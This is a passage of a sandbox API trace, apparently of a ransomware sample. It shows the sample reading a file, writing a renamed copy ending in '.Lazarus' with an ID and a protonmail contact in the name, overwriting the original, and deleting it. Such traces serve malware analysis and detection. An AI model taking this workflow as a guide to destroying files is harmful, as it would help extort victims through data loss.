0x88518 [0060.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0060.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0060.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.909] AreFileApisANSI () returned 1 [0060.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x693f0 [0060.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x693f0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 36 [0060.909] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f)) returned 1 [0060.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0060.909] AreFileApisANSI () returned 1 [0060.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0060.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0060.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0060.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.910] GetLastError () returned 0x0 [0060.910] SetLastError (dwErrCode=0x0) [0060.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0060.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8a210 [0060.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0060.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0060.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0060.910] GetLastError () returned 0x0 [0060.910] SetLastError (dwErrCode=0x0) [0060.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0060.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68f40 [0060.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0060.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76098 [0060.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0060.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0060.910] AreFileApisANSI () returned 1 [0060.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0060.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0060.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0060.911] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.913] GetFileType (hFile=0x41c) returned 0x1 [0060.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0060.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0060.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0060.913] AreFileApisANSI () returned 1 [0060.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69490 [0060.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x69490, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 36 [0060.913] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.914] GetFileType (hFile=0x420) returned 0x1 [0060.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0060.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0060.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.914] GetLastError () returned 0x0 [0060.914] SetLastError (dwErrCode=0x0) [0060.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.914] GetLastError () returned 0x0 [0060.914] SetLastError (dwErrCode=0x0) [0060.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0060.914] ReadFile (in: hFile=0x420, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0060.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0060.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0060.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0060.917] GetLastError () returned 0x0 [0060.917] SetLastError (dwErrCode=0x0) [0060.917] GetLastError () returned 0x0 [0060.917] SetLastError (dwErrCode=0x0) [0060.917] GetLastError () returned 0x0 [0060.917] SetLastError (dwErrCode=0x0) [0060.917] GetLastError () returned 0x0 [0060.917] SetLastError (dwErrCode=0x0) [0060.917] ReadFile (in: hFile=0x420, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0xd8f, lpOverlapped=0x0) returned 1 [0061.065] WriteFile (in: hFile=0x41c, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.066] GetLastError () returned 0x0 [0061.066] SetLastError (dwErrCode=0x0) [0061.066] GetLastError () returned 0x0 [0061.066] SetLastError (dwErrCode=0x0) [0061.067] GetLastError () returned 0x0 [0061.067] SetLastError (dwErrCode=0x0) [0061.067] ReadFile (in: hFile=0x420, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0061.067] GetLastError () returned 0x0 [0061.067] SetLastError (dwErrCode=0x0) [0061.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xf) returned 0x7d588 [0061.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0061.067] GetLastError () returned 0x0 [0061.067] SetLastError (dwErrCode=0x0) [0061.068] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0061.068] WriteFile (in: hFile=0x41c, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0xd90, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327ef70*=0xd90, lpOverlapped=0x0) returned 1 [0061.068] GetLastError () returned 0x0 [0061.069] SetLastError (dwErrCode=0x0) [0061.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0061.069] GetLastError () returned 0x0 [0061.069] SetLastError (dwErrCode=0x0) [0061.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0061.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0061.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0061.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0061.069] CloseHandle (hObject=0x41c) returned 1 [0061.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0061.070] CloseHandle (hObject=0x420) returned 1 [0061.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0061.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0061.070] AreFileApisANSI () returned 1 [0061.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69170 [0061.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 36 [0061.070] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.071] GetFileType (hFile=0x420) returned 0x1 [0061.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0061.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0061.072] GetLastError () returned 0xb7 [0061.072] SetLastError (dwErrCode=0xb7) [0061.072] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0061.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0061.073] CloseHandle (hObject=0x420) returned 1 [0061.073] AreFileApisANSI () returned 1 [0061.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0061.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 36 [0061.073] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf")) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.074] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x121e6, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0061.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0061.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0061.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0061.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.075] AreFileApisANSI () returned 1 [0061.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0061.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0061.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0061.076] AreFileApisANSI () returned 1 [0061.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0061.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 45 [0061.076] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.076] GetFileType (hFile=0x420) returned 0x1 [0061.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.076] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0061.076] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0061.076] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0061.076] CloseHandle (hObject=0x420) returned 1 [0061.077] AreFileApisANSI () returned 1 [0061.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0061.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 45 [0061.077] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.077] GetFileType (hFile=0x420) returned 0x1 [0061.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.077] CloseHandle (hObject=0x420) returned 1 [0061.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.078] 